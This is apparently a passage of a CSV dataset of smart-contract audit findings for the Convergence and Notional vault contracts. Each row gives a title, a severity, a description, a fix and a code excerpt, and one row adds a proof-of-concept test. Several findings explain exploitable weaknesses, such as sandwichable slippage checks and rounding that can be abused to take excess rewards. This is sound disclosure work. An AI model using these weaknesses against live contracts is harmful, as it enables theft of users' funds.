This way they will always match no matter what.",Auctions are completely bricked,```\\n for (uint256 i; i < numRecipients; ) {\\n expectedTotalValue += amounts[i];\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n if (msg.value != expectedTotalValue) {\\n revert INVALID_DEPOSIT();\\n }\\n```\\n +"Lowering the gauge weight can disrupt accounting, potentially leading to both excessive fund distribution and a loss of funds.",high,"Similar issues were found by users 0xDetermination and bart1e in the Canto veRWA audit, which uses a similar gauge controller type.\\nWhen the _change_gauge_weight function is called, the `points_weight[addr][next_time].bias` andtime_weight[addr] are updated - the slope is not.\\n```\\ndef _change_gauge_weight(addr: address, weight: uint256):\\n # Change gauge weight\\n # Only needed when testing in reality\\n gauge_type: int128 = self.gauge_types_[addr] - 1\\n old_gauge_weight: uint256 = self._get_weight(addr)\\n type_weight: uint256 = self._get_type_weight(gauge_type)\\n old_sum: uint256 = self._get_sum(gauge_type)\\n _total_weight: uint256 = self._get_total()\\n next_time: uint256 = (block.timestamp + WEEK) / WEEK * WEEK\\n\\n self.points_weight[addr][next_time].bias = weight\\n self.time_weight[addr] = next_time\\n\\n new_sum: uint256 = old_sum + weight - old_gauge_weight\\n self.points_sum[gauge_type][next_time].bias = new_sum\\n self.time_sum[gauge_type] = next_time\\n\\n _total_weight = _total_weight + new_sum * type_weight - old_sum * type_weight\\n self.points_total[next_time] = _total_weight\\n self.time_total = next_time\\n\\n log NewGaugeWeight(addr, block.timestamp, weight, _total_weight)\\n```\\n\\nThe equation f(t) = c - mx represents the gauge's decay equation before the weight is reduced. In this equation, `m` is the slope. 
After the weight is reduced by an amount `k` using the `change_gauge_weight` function, the equation becomes f(t) = c - `k` - mx The slope `m` remains unchanged, but the t-axis intercept changes from t1 = c/m to t2 = (c-k)/m.\\nSlope adjustments that should be applied to the global slope when decay reaches 0 are stored in the `changes_sum` hashmap. And is not affected by changes in gauge weight. Consequently, there's a time window t1 - t2 during which the earlier slope changes applied to the global state when user called `vote_for_gauge_weights` function remains applied even though they should have been subtracted. This in turn creates a situation in which the global weightis less than the sum of the individual gauge weights, resulting in an accounting error.\\nSo, in the `CvgRewards` contract when the `writeStakingRewards` function invokes the `_checkpoint`, which subsequently triggers the `gauge_relative_weight_writes` function for the relevant time period, the calculated relative weight becomes inflated, leading to an increase in the distributed rewards. If all available rewards are distributed before the entire array is processed, the remaining users will receive no rewards.""\\nThe issue mainly arises when a gauge's weight has completely diminished to zero. 
This is certain to happen if a gauge with a non-zero bias, non-zero slope, and a t-intercept exceeding the current time is killed using `kill_gauge` function.\\nAdditionally, decreasing a gauge's weight introduces inaccuracies in its decay equation, as is evident in the t-intercept.","Disable weight reduction, or only allow reset to 0.","The way rewards are calculated is broken, leading to an uneven distribution of rewards, with some users receiving too much and others receiving nothing.","```\\ndef _change_gauge_weight(addr: address, weight: uint256):\\n # Change gauge weight\\n # Only needed when testing in reality\\n gauge_type: int128 = self.gauge_types_[addr] - 1\\n old_gauge_weight: uint256 = self._get_weight(addr)\\n type_weight: uint256 = self._get_type_weight(gauge_type)\\n old_sum: uint256 = self._get_sum(gauge_type)\\n _total_weight: uint256 = self._get_total()\\n next_time: uint256 = (block.timestamp + WEEK) / WEEK * WEEK\\n\\n self.points_weight[addr][next_time].bias = weight\\n self.time_weight[addr] = next_time\\n\\n new_sum: uint256 = old_sum + weight - old_gauge_weight\\n self.points_sum[gauge_type][next_time].bias = new_sum\\n self.time_sum[gauge_type] = next_time\\n\\n _total_weight = _total_weight + new_sum * type_weight - old_sum * type_weight\\n self.points_total[next_time] = _total_weight\\n self.time_total = next_time\\n\\n log NewGaugeWeight(addr, block.timestamp, weight, _total_weight)\\n```\\n" +Tokens that are both bribes and StakeDao gauge rewards will cause loss of funds,high,"When SdtStakingPositionService is pulling rewards and bribes from buffer, the buffer will return a list of tokens and amounts owed. This list is used to set the rewards eligible for distribution. Since this list is never check for duplicate tokens, a shared bribe and reward token would cause the token to show up twice in the list. 
The issue it that _sdtRewardsByCycle is set and not incremented which will cause the second occurrence of the token to overwrite the first and break accounting. The amount of token received from the gauge reward that is overwritten will be lost forever.\\nIn L559 of SdtStakingPositionService it receives a list of tokens and amount from the buffer.\\nSdtBuffer.sol#L90-L168\\n```\\n ICommonStruct.TokenAmount[] memory bribeTokens = _sdtBlackHole.pullSdStakingBribes(\\n processor,\\n _processorRewardsPercentage\\n );\\n\\n uint256 rewardAmount = _gaugeAsset.reward_count();\\n\\n ICommonStruct.TokenAmount[] memory tokenAmounts = new ICommonStruct.TokenAmount[](\\n rewardAmount + bribeTokens.length\\n );\\n\\n uint256 counter;\\n address _processor = processor;\\n for (uint256 j; j < rewardAmount; ) {\\n IERC20 token = _gaugeAsset.reward_tokens(j);\\n uint256 balance = token.balanceOf(address(this));\\n if (balance != 0) {\\n uint256 fullBalance = balance;\\n\\n // rest of code\\n\\n token.transfer(sdtRewardsReceiver, balance);\\n\\n **@audit token and amount added from reward_tokens pulled directly from gauge**\\n\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: balance});\\n }\\n\\n // rest of code\\n\\n }\\n\\n for (uint256 j; j < bribeTokens.length; ) {\\n IERC20 token = bribeTokens[j].token;\\n uint256 amount = bribeTokens[j].amount;\\n\\n **@audit token and amount added directly with no check for duplicate token**\\n\\n if (amount != 0) {\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: amount});\\n\\n // rest of code\\n\\n }\\n```\\n\\nSdtBuffer#pullRewards returns a list of tokens that is a concatenated array of all bribe and reward tokens. There is not controls in place to remove duplicates from this list of tokens. 
This means that tokens that are both bribes and rewards will be duplicated in the list.\\nSdtStakingPositionService.sol#L561-L577\\n```\\n for (uint256 i; i < _rewardAssets.length; ) {\\n IERC20 _token = _rewardAssets[i].token;\\n uint256 erc20Id = _tokenToId[_token];\\n if (erc20Id == 0) {\\n uint256 _numberOfSdtRewards = ++numberOfSdtRewards;\\n _tokenToId[_token] = _numberOfSdtRewards;\\n erc20Id = _numberOfSdtRewards;\\n }\\n\\n **@audit overwrites and doesn't increment causing duplicates to be lost** \\n\\n _sdtRewardsByCycle[_cvgStakingCycle][erc20Id] = ICommonStruct.TokenAmount({\\n token: _token,\\n amount: _rewardAssets[i].amount\\n });\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nWhen storing this list of rewards, it overwrites _sdtRewardsByCycle with the values from the returned array. This is where the problem arises because duplicates will cause the second entry to overwrite the first entry. Since the first instance is overwritten, all funds in the first occurrence will be lost permanently.",Either sdtBuffer or SdtStakingPositionService should be updated to combine duplicate token entries and prevent overwriting.,Tokens that are both bribes and rewards will be cause tokens to be lost forever,"```\\n ICommonStruct.TokenAmount[] memory bribeTokens = _sdtBlackHole.pullSdStakingBribes(\\n processor,\\n _processorRewardsPercentage\\n );\\n\\n uint256 rewardAmount = _gaugeAsset.reward_count();\\n\\n ICommonStruct.TokenAmount[] memory tokenAmounts = new ICommonStruct.TokenAmount[](\\n rewardAmount + bribeTokens.length\\n );\\n\\n uint256 counter;\\n address _processor = processor;\\n for (uint256 j; j < rewardAmount; ) {\\n IERC20 token = _gaugeAsset.reward_tokens(j);\\n uint256 balance = token.balanceOf(address(this));\\n if (balance != 0) {\\n uint256 fullBalance = balance;\\n\\n // rest of code\\n\\n token.transfer(sdtRewardsReceiver, balance);\\n\\n **@audit token and amount added from reward_tokens pulled directly from gauge**\\n\\n 
tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: balance});\\n }\\n\\n // rest of code\\n\\n }\\n\\n for (uint256 j; j < bribeTokens.length; ) {\\n IERC20 token = bribeTokens[j].token;\\n uint256 amount = bribeTokens[j].amount;\\n\\n **@audit token and amount added directly with no check for duplicate token**\\n\\n if (amount != 0) {\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: amount});\\n\\n // rest of code\\n\\n }\\n```\\n" +Delegation Limitation in Voting Power Management,medium,"MgCVG Voting power delegation system is constrained by 2 hard limits, first on the number of tokens delegated to one user (maxTokenIdsDelegated = 25) and second on the number of delegatees for one token ( maxMgDelegatees = 5). Once this limit is reached for a token, the token owner cannot modify the delegation percentage to an existing delegated user. This inflexibility can prevent efficient and dynamic management of delegated voting power.\\nObserve these lines :\\n```\\nfunction delegateMgCvg(uint256 _tokenId, address _to, uint96 _percentage) external onlyTokenOwner(_tokenId) {\\n require(_percentage <= 100, ""INVALID_PERCENTAGE"");\\n\\n uint256 _delegateesLength = delegatedMgCvg[_tokenId].length;\\n require(_delegateesLength < maxMgDelegatees, ""TOO_MUCH_DELEGATEES"");\\n\\n uint256 tokenIdsDelegated = mgCvgDelegatees[_to].length;\\n require(tokenIdsDelegated < maxTokenIdsDelegated, ""TOO_MUCH_MG_TOKEN_ID_DELEGATED"");\\n```\\n\\nif either `maxMgDelegatees` or `maxTokenIdsDelegated` are reached, delegation is no longer possible. 
The problem is the fact that this function can be either used to delegate or to update percentage of delegation or also to remove a delegation but in cases where we already delegated to a maximum of users (maxMgDelegatees) OR the user to who we delegated has reached the maximum number of tokens that can be delegated to him/her (maxTokenIdsDelegated), an update or a removal of delegation is no longer possible.\\n6 scenarios are possible :\\n`maxTokenIdsDelegated` is set to 5, Alice is the third to delegate her voting power to Bob and choose to delegate 10% to him. Bob gets 2 other people delegating their tokens to him, Alice wants to increase the power delegated to Bob to 50% but she cannot due to Bob reaching `maxTokenIdsDelegated`\\n`maxTokenIdsDelegated` is set to 25, Alice is the 10th to delegate her voting power to Bob and choose to delegate 10%, DAO decrease `maxTokenIdsDelegated` to 3, Alice wants to increase the power delegated to Bob to 50%, but she cannot due to this\\n`maxTokenIdsDelegated` is set to 5, Alice is the third to delegate her voting power to Bob and choose to delegate 90%. Bob gets 2 other people delegating their tokens to him, Alice wants to only remove the power delegated to Bob using this function, but she cannot due to this\\n`maxMgDelegatees` is set to 3, Alice delegates her voting power to Bob,Charly and Donald by 20% each, Alice reaches `maxMgDelegatees` and she cannot update her voting power for any of Bob,Charly or Donald\\n`maxMgDelegatees` is set to 5, Alice delegates her voting power to Bob,Charly and Donald by 20% each,DAO decreasesmaxMgDelegatees to 3. 
Alice cannot update or remove her voting power delegated to any of Bob,Charly and Donald\\n`maxMgDelegatees` is set to 3, Alice delegates her voting power to Bob,Charly and Donald by 20% each, Alice wants to only remove her delegation to Bob but she reached `maxMgDelegatees` so she cannot only remove her delegation to Bob\\nA function is provided to remove all user to who we delegated but this function cannot be used as a solution to this problem due to 2 things :\\nIt's clearly not intended to do an update of voting power percentage by first removing all delegation we did because `delegateMgCvg()` is clearly defined to allow to delegate OR to remove one delegation OR to update percentage of delegation but in some cases it's impossible which is not acceptable\\nif Alice wants to update it's percentage delegated to Bob , she would have to remove all her delegatees and would take the risk that someone is faster than her and delegate to Bob before her, making Bob reaches `maxTokenIdsDelegated` and would render impossible for Alice to re-delegate to Bob\\nPOC\\nYou can add it to test/ut/delegation/balance-delegation.spec.ts :\\n```\\nit(""maxTokenIdsDelegated is reached => Cannot update percentage of delegate"", async function () {\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(3);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(3);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user2).delegateMgCvg(2, user10, 30);\\n await lockingPositionDelegate.connect(user3).delegateMgCvg(3, user10, 30);\\n \\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith(""TOO_MUCH_MG_TOKEN_ID_DELEGATED"");\\n });\\n it(""maxTokenIdsDelegated IS DECREASED => PERCENTAGE UPDATE IS NO LONGER POSSIBLE"", async 
function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(25);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user2).delegateMgCvg(2, user10, 30);\\n await lockingPositionDelegate.connect(user3).delegateMgCvg(3, user10, 30);\\n\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(3);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(3); \\n\\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith(""TOO_MUCH_MG_TOKEN_ID_DELEGATED"");\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(25);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n });\\n it(""maxMgDelegatees : TRY TO UPDATE PERCENTAGE DELEGATED TO A USER IF WE ALREADY REACH maxMgDelegatees"", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(3);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(3);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 30);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user3, 30);\\n\\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith(""TOO_MUCH_DELEGATEES"");\\n });\\n it(""maxMgDelegatees : maxMgDelegatees IS DECREASED => PERCENTAGE UPDATE IS NO LONGER POSSIBLE"", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(5);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(5);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await 
lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 30);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user3, 10);\\n\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(2);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(2);\\n\\n const txFail2 = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 50);\\n await expect(txFail2).to.be.revertedWith(""TOO_MUCH_DELEGATEES"");\\n });\\n```\\n",Issue Delegation Limitation in Voting Power Management\\nSeparate functions for new delegations and updates : Implement logic that differentiates between adding a new delegatee and updating an existing delegation to allow updates to existing delegations even if the maximum number of delegatees is reached,"In some cases it is impossible to update percentage delegated or to remove only one delegated percentage then forcing users to remove all their voting power delegatations, taking the risk that someone is faster then them to delegate to their old delegated users and reach threshold for delegation, making impossible for them to re-delegate","```\\nfunction delegateMgCvg(uint256 _tokenId, address _to, uint96 _percentage) external onlyTokenOwner(_tokenId) {\\n require(_percentage <= 100, ""INVALID_PERCENTAGE"");\\n\\n uint256 _delegateesLength = delegatedMgCvg[_tokenId].length;\\n require(_delegateesLength < maxMgDelegatees, ""TOO_MUCH_DELEGATEES"");\\n\\n uint256 tokenIdsDelegated = mgCvgDelegatees[_to].length;\\n require(tokenIdsDelegated < maxTokenIdsDelegated, ""TOO_MUCH_MG_TOKEN_ID_DELEGATED"");\\n```\\n" +cvgControlTower and veCVG lock timing will be different and lead to yield loss scenarios,medium,"When creating a locked CVG position, there are two more or less independent locks that are created. The first is in lockingPositionService and the other is in veCVG. LockingPositionService operates on cycles (which are not finite length) while veCVG always rounds down to the absolute nearest week. 
The disparity between these two accounting mechanisms leads to a conflicting scenario where the lock on LockingPositionService can be expired while the lock on veCVG isn't (and vice versa). Additionally, tokens with expired locks on LockingPositionService cannot be extended. The result is that the token is expired but can't be withdrawn. The result of this is that the expired token must wait to be unstaked and then restaked, causing loss of user yield and voting power while the token is DOS'd.\\nCycles operate using block.timestamp when setting lastUpdateTime on the new cycle in L345. It also requires that at least 7 days have passed since this update to roll the cycle forward in L205. The result is that the cycle can never be exactly 7 days long and the start/end of the cycle will constantly fluctuate.\\nMeanwhile when veCVG is calculating the unlock time it uses the week rounded down as shown in L328.\\nWe can demonstrate with an example:\\nAssume the first CVG cycle is started at block.timestamp == 1,000,000. This means our first cycle ends at 1,604,800. A user deposits for a single cycle at 1,400,000. A lock is created for cycle 2 which will unlock at 2,209,600.\\nThe lock on veCVG does not match this though. Instead its calculation will yield:\\n```\\n(1,400,000 + 2 * 604,800) / 604,800 = 4\\n\\n4 * 604,800 = 2,419,200\\n```\\n\\nAs seen these are mismatched and the token won't be withdrawable until much after it should be due to the check in veCVG L404.\\nThis DOS will prevent the expired lock from being unstaked and restaked which causes loss of yield.\\nThe opposite issue can also occur. For each cycle that is slightly longer than expected the veCVG lock will become further and further behind the cycle lock on lockingPositionService. This can also cause a DOS and yield loss because it could prevent users from extending valid locks due to the checks in L367 of veCVG.\\nAn example of this:\\nAssume a user locks for 96 weeks (58,060,800). 
Over the course of that year, it takes an average of 2 hours between the end of each cycle and when the cycle is rolled over. This effectively extends our cycle time from 604,800 to 612,000 (+7200). Now after 95 cycles, the user attempts to increase their lock duration. veCVG and lockingPositionService will now be completely out of sync:\\nAfter 95 cycles the current time would be:\\n```\\n612,000 * 95 = 58,140,000\\n```\\n\\nWhereas veCVG lock ended:\\n```\\n612,000 * 96 = 58,060,800\\n```\\n\\nAccording to veCVG the position was unlocked at 58,060,800 and therefore increasing the lock time will revert due to L367\\nThe result is another DOS that will cause the user loss of yield. During this time the user would also be excluded from taking place in any votes since their veCVG lock is expired.","I would recommend against using block.timestamp for CVG cycles, instead using an absolute measurement like veCVG uses.",Unlock DOS that cause loss of yield to the user,"```\\n(1,400,000 + 2 * 604,800) / 604,800 = 4\\n\\n4 * 604,800 = 2,419,200\\n```\\n" +SdtRewardReceiver#_withdrawRewards has incorrect slippage protection and withdraws can be sandwiched,medium,"The _min_dy parameter of poolCvgSDT.exchange is set via the poolCvgSDT.get_dy method. The problem with this is that get_dy is a relative output that is executed at runtime. This means that no matter the state of the pool, this slippage check will never work.\\nSdtRewardReceiver.sol#L229-L236\\n```\\n if (isMint) {\\n /// @dev Mint cvgSdt 1:1 via CvgToke contract\\n cvgSdt.mint(receiver, rewardAmount);\\n } else {\\n ICrvPoolPlain _poolCvgSDT = poolCvgSDT;\\n /// @dev Only swap if the returned amount in CvgSdt is gretear than the amount rewarded in SDT\\n _poolCvgSDT.exchange(0, 1, rewardAmount, _poolCvgSDT.get_dy(0, 1, rewardAmount), receiver);\\n }\\n```\\n\\nWhen swapping from SDT to cvgSDT, get_dy is used to set _min_dy inside exchange. 
The issue is that get_dy is the CURRENT amount that would be received when swapping as shown below:\\n```\\n@view\\n@external\\ndef get_dy(i: int128, j: int128, dx: uint256) -> uint256:\\n """"""\\n @notice Calculate the current output dy given input dx\\n @dev Index values can be found via the `coins` public getter method\\n @param i Index value for the coin to send\\n @param j Index valie of the coin to recieve\\n @param dx Amount of `i` being exchanged\\n @return Amount of `j` predicted\\n """"""\\n rates: uint256[N_COINS] = self.rate_multipliers\\n xp: uint256[N_COINS] = self._xp_mem(rates, self.balances)\\n\\n x: uint256 = xp[i] + (dx * rates[i] / PRECISION)\\n y: uint256 = self.get_y(i, j, x, xp, 0, 0)\\n dy: uint256 = xp[j] - y - 1\\n fee: uint256 = self.fee * dy / FEE_DENOMINATOR\\n return (dy - fee) * PRECISION / rates[j]\\n```\\n\\nThe return value is EXACTLY the result of a regular swap, which is where the problem is. There is no way that the exchange call can ever revert. Assume the user is swapping because the current exchange ratio is 1:1.5. Now assume their withdraw is sandwich attacked. The ratio is change to 1:0.5 which is much lower than expected. When get_dy is called it will simulate the swap and return a ratio of 1:0.5. 
This in turn doesn't protect the user at all and their swap will execute at the poor price.",Allow the user to set _min_dy directly so they can guarantee they get the amount they want,SDT rewards will be sandwiched and can lose the entire balance,"```\\n if (isMint) {\\n /// @dev Mint cvgSdt 1:1 via CvgToke contract\\n cvgSdt.mint(receiver, rewardAmount);\\n } else {\\n ICrvPoolPlain _poolCvgSDT = poolCvgSDT;\\n /// @dev Only swap if the returned amount in CvgSdt is gretear than the amount rewarded in SDT\\n _poolCvgSDT.exchange(0, 1, rewardAmount, _poolCvgSDT.get_dy(0, 1, rewardAmount), receiver);\\n }\\n```\\n" +Division difference can result in a revert when claiming treasury yield and excess rewards to some users,medium,"Different ordering of calculations are used to compute `ysTotal` in different situations. This causes the totalShares tracked to be less than the claimable amount of shares\\n`ysTotal` is calculated differently when adding to `totalSuppliesTracking` and when computing `balanceOfYsCvgAt`. 
When adding to `totalSuppliesTracking`, the calculation of `ysTotal` is as follows:\\n```\\n uint256 cvgLockAmount = (amount * ysPercentage) / MAX_PERCENTAGE;\\n uint256 ysTotal = (lockDuration * cvgLockAmount) / MAX_LOCK;\\n```\\n\\nIn `balanceOfYsCvgAt`, `ysTotal` is calculated as follows:\\n```\\n uint256 ysTotal = (((endCycle - startCycle) * amount * ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n```\\n\\nThis difference allows the `balanceOfYsCvgAt` to be greater than what is added to `totalSuppliesTracking`.\\nPOC\\n```\\n startCycle 357\\n endCycle 420\\n lockDuration 63\\n amount 2\\n ysPercentage 80\\n```\\n\\nCalculation in `totalSuppliesTracking` gives:\\n```\\n uint256 cvgLockAmount = (2 * 80) / 100; == 1\\n uint256 ysTotal = (63 * 1) / 96; == 0\\n```\\n\\nCalculation in `balanceOfYsCvgAt` gives:\\n```\\n uint256 ysTotal = ((63 * 2 * 80) / 100) / 96; == 10080 / 100 / 96 == 1\\n```\\n\\nExample Scenario\\nAlice, Bob and Jake lock cvg for 1 TDE and obtain a rounded-up `balanceOfYsCvgAt`. A user who is aware of this issue can exploit this issue further by using `increaseLockAmount` with small amount values by which the total difference between the user's calculated `balanceOfYsCvgAt` and the accounted amount in `totalSuppliesTracking` can be increased. Bob and Jake claim the reward at the end of the reward cycle. When Alice attempts to claim rewards, it reverts since there is not enough reward to be sent.",Perform the same calculation in both places\\n```\\n+++ uint256 _ysTotal = (_extension.endCycle - _extension.cycleId)* ((_extension.cvgLocked * _lockingPosition.ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n--- uint256 ysTotal = (((endCycle - startCycle) * amount * ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n```\\n,This breaks the shares accounting of the treasury rewards. 
Some user's will get more than the actual intended rewards while the last withdrawals will result in a revert,```\\n uint256 cvgLockAmount = (amount * ysPercentage) / MAX_PERCENTAGE;\\n uint256 ysTotal = (lockDuration * cvgLockAmount) / MAX_LOCK;\\n```\\n +Different spot prices used during the comparison,high,"The spot prices used during the comparison are different, which might result in the trade proceeding even if the pool is manipulated, leading to a loss of assets.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n\\nLine 91 above calls the `SPOT_PRICE.getComposableSpotPrices` function to fetch the spot prices. Within the function, it relies on the `StableMath._calcSpotPrice` function to compute the spot price. Per the comments of this function, `spot price of token Y in token X` and `spot price Y/X` means that the Y (base) / X (quote). 
Thus, secondary (base) / primary (quote).\\n```\\nFile: StableMath.sol\\n /**\\n * @dev Calculates the spot price of token Y in token X.\\n */\\n function _calcSpotPrice(\\n uint256 amplificationParameter,\\n uint256 invariant, \\n uint256 balanceX,\\n uint256 balanceY\\n ) internal pure returns (uint256) {\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n\\n unchecked {\\n uint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n```\\n\\nThe above spot price will be used within the `_calculateLPTokenValue` function to compare with the oracle price to detect any potential pool manipulation. However, the oracle price returned is in primary (base) / secondary (quote) format. As such, the comparison between the spot price (secondary-base/primary-quote) and oracle price (primary-base/secondary-quote) will be incorrect.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function _calculateLPTokenValue(\\n..SNIP..\\n uint256 price = _getOraclePairPrice(primaryToken, address(tokens[i]));\\n\\n // Check that the spot price and the oracle price are near each other. 
If this is\\n // not true then we assume that the LP pool is being manipulated.\\n uint256 lowerLimit = price * (Constants.VAULT_PERCENT_BASIS - limit) / Constants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = price * (Constants.VAULT_PERCENT_BASIS + limit) / Constants.VAULT_PERCENT_BASIS;\\n if (spotPrices[i] < lowerLimit || upperLimit < spotPrices[i]) {\\n revert Errors.InvalidPrice(price, spotPrices[i]);\\n }\\n```\\n","Consider verifying if the comment of the `StableMath._calcSpotPrice` function is aligned with its implementation with the Balancer team.\\nIn addition, the `StableMath._calcSpotPrice` function is no longer used or found within the current version of Balancer's composable pool. Thus, there is no guarantee that the math within the `StableMath._calcSpotPrice` works with the current implementation. It is recommended to use the existing method in the current Composable Pool's StableMath, such as `_calcOutGivenIn` (ensure the fee is excluded) to compute the spot price.","If the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. 
In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.","```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n" +BPT LP Token could be sold off during re-investment,medium,"BPT LP Token could be sold off during the re-investment process. BPT LP Tokens must not be sold to external DEXs under any circumstance because:\\nThey are used to redeem the underlying assets from the pool when someone exits the vault\\nThe BPTs represent the total value of the vault\\nWithin the `ConvexStakingMixin._isInvalidRewardToken` function, the implementation ensures that the LP Token (CURVE_POOL_TOKEN) is not intentionally or accidentally sold during the reinvestment process.\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n\\nHowever, the same control was not implemented for the Balancer/Aura code. As a result, it is possible for LP Token (BPT) to be sold during reinvestment. Note that for non-composable Balancer pools, the pool tokens does not consists of the BPT token. 
Thus, it needs to be explicitly defined within the `_isInvalidRewardToken` function.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\nPer the sponsor's clarification below, the contracts should protect against the bot doing unintended things (including acting maliciously) due to coding errors, which is one of the main reasons for having the `_isInvalidRewardToken` function. Thus, this issue is a valid bug in the context of this audit contest.\\n",Ensure that the LP tokens cannot be sold off during re-investment.\\n```\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n// Add the line below\\n token == BALANCER_POOL_TOKEN ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n}\\n```\\n,LP tokens (BPT) might be accidentally or maliciously sold off by the bots during the re-investment process. 
BPT LP Tokens must not be sold to external DEXs under any circumstance because:\\nThey are used to redeem the underlying assets from the pool when someone exits the vault\\nThe BPTs represent the total value of the vault,```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n +Fewer than expected LP tokens if the pool is imbalanced during vault restoration,high,"The vault restoration function intends to perform a proportional deposit. If the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal. This results in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss for the vault shareholder.\\nPer the comment on Line 498, it was understood that the `restoreVault` function intends to deposit the withdrawn tokens back into the pool proportionally.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Restores withdrawn tokens from emergencyExit back 